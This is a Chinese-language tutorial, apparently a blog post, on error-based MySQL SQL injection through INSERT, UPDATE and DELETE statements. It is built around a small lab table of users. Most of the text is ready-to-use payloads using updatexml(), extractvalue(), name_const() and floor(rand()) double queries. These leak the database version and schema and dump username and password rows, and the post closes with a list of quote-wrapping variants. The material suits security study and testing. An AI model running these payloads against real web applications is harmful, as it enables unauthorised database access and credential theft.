前言:相比基於查詢的SQL注入,使用insert、update和delete進行SQL注入顯得略顯另類
參考自:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf
0x1 准備條件
a. mysql數據庫
b. 創建用於實驗的數據庫和表
Create database newdb; use newdb CREATE TABLE users ( id int(3) NOT NULL AUTO_INCREMENT, username varchar(20) NOT NULL, password varchar(20) NOT NULL, PRIMARY KEY (id) );
c. 添加部分數據 : INSERT INTO users (id, username, password) VALUES (1, 'r00tgrok', 'ohmygod_is_r00tgrok');
0x2 使用updatexml()函數 // xpath injection
1. 注入
a. 載荷格式 :or updatexml(1,concat(0x7e,(version())),0) or
b. insert注入:INSERT INTO users (id, username, password) VALUES (2,'Pseudo_Z' or updatexml(1,concat(0x7e,(version())),0) or'', 'security-eng');
c. update注入:UPDATE users SET password='security-eng' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Pseudo_Z';
d. delete注入:DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
2. 提取數據
a. 載荷格式:
or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or
b. insert提取表名:
INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');
c. insert提取列名
INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');
d. insert進行dump
INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');
e. delete進行dump
DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '';
f.update進行dump ?
同一個表不能用update進行dump,不同的表卻可以
UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=1;
3.小貼士
a.報錯,然后爆出了要提取的信息
b. 按照作者paper上的代碼,mysql5.6.19, 前面提取信息成功,后面dump報錯:[Err] 1093 - You can't specify target table 'users' for update in FROM clause
c. google之,給出找到的兩個參考:
//報錯代碼 DELETE FROM table_name where coulmn_name IN (SELECT coulmn_name FROM table_name WHERE coulmn_name > 10);
//修正代碼 DELETE FROM table_name where coulmn_name IN ( SELECT * FROM (SELECT coulmn_name FROM table_name WHERE coulmn_name > 10) AS X) ;
//說明 不能刪除子查詢指向的相同數據源中的行,update同理
CREATE TABLE comments(id int primary key, phrase text, uid int); INSERT INTO comments VALUES(1, 'admin user comments',1), (2, 'HR User Comments',2), (3, 'RH User Comments',2); UPDATE comments SET phrase = (SELECT phrase FROM comments WHERE uid=2 AND id=2) WHERE id = 3;
修復代碼:
UPDATE comments SET phrase =( SELECT phrase FROM ( SELECT * FROM comments ) AS c1 WHERE c1.uid=2 AND c1.id=2 ) WHERE id =3;
說明:當你同時使用子查詢讀取相同的數據時,mysql不允許update、delete表中的數據;mysql會將from語句中的子查詢作為一個臨時表,將子查詢封裝到from語句中更深 層的子查詢中會使其被執行並存儲的臨時表中,然后在外部子查詢中隱式引用
4. updatexml() [ 返回被替換的XML段], updatexml()是mysql中的XML函數,還有一個為extractvalue() [使用Xpath符號從xml字符串中提取值],也是下文要用到的
eg. SET @xml = '<a><b>X</b><b>Y</b></a>';
SET @i =1, @j = 2;
SELECT @i, ExtractValue(@xml, '//b[$@i]');
//ExtractValue(xml_frag, xpath_expr) //UpdateXML(xml_target, xpath_expr, new_xml)
Xpath有較多限制,如不支持節點集的比較,不支持string()等函數,另外Xpath注入類似於SQL注入,語法上略有不同
0x3 使用extractvalue()函數
a. 載荷格式:or extractvalue(1,concat(0x7e,database())) or
b. 注入:
INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,database())) or'', 'Pseudo_Z');
UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Pseudo_Z';
DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';
c.提取數據
INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'balabala');
dump操作及update、delete方法同上updatexml()
0x4 使用name_const() //5.0.13中引入,返回任何給定的值
a. 載荷格式: or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or
b. 注入:
UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE
id=2 and username='Pseudo_Z';
c. 提取數據
INSERT INTO users (id, username, password) VALUES (1,'admin' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'oyyoug0d');
0x5 二次查詢注入 //mysql沒有二次查詢,因此使用子查詢
1. 注入
INSERT INTO users (id, username, password) VALUES (1,'r00tgrok' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM
information_schema.columns group by x)a) or'', 'Bl4ckhat');
DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;
2. 提取數據
INSERT INTO users (id, username, password) VALUES (1, 'Pseudo_Z' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT
concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'jesus-2014');
0x6 其他變種
' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
'* (payload) *'
' or (payload) and '
" – (payload) – "
附:http://websec.ca/kb/sql_injection